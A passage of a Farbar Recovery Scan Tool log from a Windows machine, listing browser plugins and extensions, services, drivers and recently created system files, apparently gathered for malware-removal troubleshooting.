FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-02-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3698744866-2675293530-421701469-1001: @facebook.com/FBPlugin,version=1.0.3 -> C:\Users\KEKLR\AppData\Roaming\Facebook\npfbplugin_1_0_3.dll [2010-06-09] ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2017-02-17] (Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com"
CHR Profile: C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default [2016-12-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
CHR HKLM-x32\...\Chrome\Extension: [jkfpchpiljkaemlpmpebnglgkomamfeo] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe [89600 2009-03-02] (Andrea Electronics Corporation)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3737792 2017-03-26] (Microsoft Corporation)
R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [677376 2016-08-02] (SEIKO EPSON CORPORATION)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
R2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON CORPORATION)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
R2 kss; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [919296 2015-06-03] (Kaspersky Lab ZAO)
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-11-20] (Hewlett-Packard Company) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S3 ose; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [198192 2017-03-25] (Microsoft Corporation) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [File not signed]
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [247152 2009-01-21] ()
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\STacSV64.exe [247808 2010-03-23] (IDT, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2017-04-08] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 npf; C:\Windows\System32\drivers\npf.sys [36600 2014-08-18] (Riverbed Technology, Inc.)
R0 pavboot; C:\Windows\System32\drivers\pavboot64.sys [33800 2009-06-30] (Panda Security, S.L.)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U4 eabfiltr; no ImagePath
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-08 14:10 - 2017-04-08 14:11 - 00030783 _____ C:\Users\KEKLR\Downloads\FRST.txt
2017-04-08 14:06 - 2017-04-08 14:10 - 02424832 _____ (Farbar) C:\Users\KEKLR\Downloads\FRST64 (1).exe
2017-04-08 14:06 - 2017-04-08 14:10 - 00000000 ____D C:\FRST
2017-04-08 13:59 - 2017-04-08 13:59 - 02424832 _____ (Farbar) C:\Users\KEKLR\Downloads\FRST64.exe
2017-04-08 13:47 - 2017-04-08 13:49 - 00000003 _____ C:\Users\KEKLR\Documents\malwarescann 4.8.2017 2.txt
2017-04-08 10:51 - 2016-08-22 15:20 - 00332512 _____ (Trend Micro Inc.) C:\Windows\system32\Drivers\tmcomm.sys
2017-04-08 10:39 - 2017-04-08 12:42 - 00000003 _____ C:\Users\KEKLR\Documents\malwarescann 4.8.2017.txt
2017-03-15 19:42 - 2017-03-04 13:24 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-03-15 19:42 - 2017-03-04 12:39 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-03-15 19:42 - 2017-03-04 04:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-03-15 19:42 - 2017-03-04 04:20 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-03-15 19:42 - 2017-03-04 04:02 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-03-15 19:42 - 2017-03-04 04:01 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-03-15 19:42 - 2017-03-04 03:59 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-03-15 19:42 - 2017-03-04 03:52 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-03-15 19:42 - 2017-03-04 03:51 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-03-15 19:42 - 2017-03-04 03:48 - 25746944 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-03-15 19:42 - 2017-03-04 03:46 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-03-15 19:42 - 2017-03-04 03:45 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-03-15 19:42 - 2017-03-04 03:45 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-03-15 19:42 - 2017-03-04 03:45 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-03-15 19:42 - 2017-03-04 03:44 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-03-15 19:42 - 2017-03-04 03:36 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-03-15 19:42 - 2017-03-04 03:32 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-03-15 19:42 - 2017-03-04 03:31 - 06045696 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-03-15 19:42 - 2017-03-04 03:23 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-03-15 19:42 - 2017-03-04 03:21 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-03-15 19:42 - 2017-03-04 03:16 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-03-15 19:42 - 2017-03-04 03:16 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-03-15 19:42 - 2017-03-04 03:13 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-03-15 19:42 - 2017-03-04 03:11 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-03-15 19:42 - 2017-03-04 02:57 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-03-15 19:42 - 2017-03-04 02:55 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-03-15 19:42 - 2017-03-04 02:54 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-03-15 19:42 - 2017-03-04 02:52 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-03-15 19:42 - 2017-03-04 02:52 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-03-15 19:42 - 2017-03-04 02:26 - 15259648 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-03-15 19:42 - 2017-03-04 02:25 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-03-15 19:42 - 2017-03-04 02:12 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-03-15 19:42 - 2017-03-04 02:02 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-03-15 19:42 - 2017-03-04 00:18 - 20281856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-03-15 19:42 - 2017-03-02 14:16 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-03-15 19:42 - 2017-03-02 14:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-03-15 19:42 - 2017-03-02 14:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-03-15 19:42 - 2017-03-02 14:01 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-03-15 19:42 - 2017-03-02 14:01 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-03-15 19:42 - 2017-03-02 14:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-03-15 19:42 - 2017-03-02 13:55 - 02287104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-03-15 19:42 - 2017-03-02 13:54 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-03-15 19:42 - 2017-03-02 13:53 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-03-15 19:42 - 2017-03-02 13:51 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-03-15 19:42 - 2017-03-02 13:50 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-03-15 19:42 - 2017-03-02 13:49 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-03-15 19:42 - 2017-03-02 13:49 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-03-15 19:42 - 2017-03-02 13:41 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-03-15 19:42 - 2017-03-02 13:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-03-15 19:42 - 2017-03-02 13:35 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-03-15 19:42 - 2017-03-02 13:32 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-03-15 19:42 - 2017-03-02 13:31 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-03-15 19:42 - 2017-03-02 13:29 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-03-15 19:42 - 2017-03-02 13:28 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-03-15 19:42 - 2017-03-02 13:22 - 04604416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-03-15 19:42 - 2017-03-02 13:21 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-03-15 19:42 - 2017-03-02 13:19 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-03-15 19:42 - 2017-03-02 13:17 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-03-15 19:42 - 2017-03-02 13:17 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-03-15 19:42 - 2017-03-02 13:11 - 13654528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-03-15 19:42 - 2017-03-02 12:53 - 02767360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-03-15 19:42 - 2017-03-02 12:50 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-03-15 19:42 - 2017-03-02 12:50 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-03-15 19:42 - 2017-02-11 11:58 - 00462848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-03-15 19:42 - 2017-02-11 11:58 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-03-15 19:42 - 2017-02-11 11:58 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-03-15 19:42 - 2017-02-10 12:32 - 00803328 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-03-15 19:42 - 2017-02-10 12:32 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-03-15 19:42 - 2017-02-10 12:17 - 00628736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2017-03-15 19:42 - 2017-02-10 12:17 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-03-15 19:42 - 2017-02-10 10:33 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-03-15 19:42 - 2017-02-09 12:36 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-03-15 19:42 - 2017-02-09 12:35 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-03-15 19:42 - 2017-02-09 12:35 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-03-15 19:42 - 2017-02-09 12:35 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-03-15 19:42 - 2017-02-09 12:35 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-03-15 19:42 - 2017-02-09 12:33 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:19 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-03-15 19:42 - 2017-02-09 12:19 - 03945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-03-15 19:42 - 2017-02-09 12:16 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
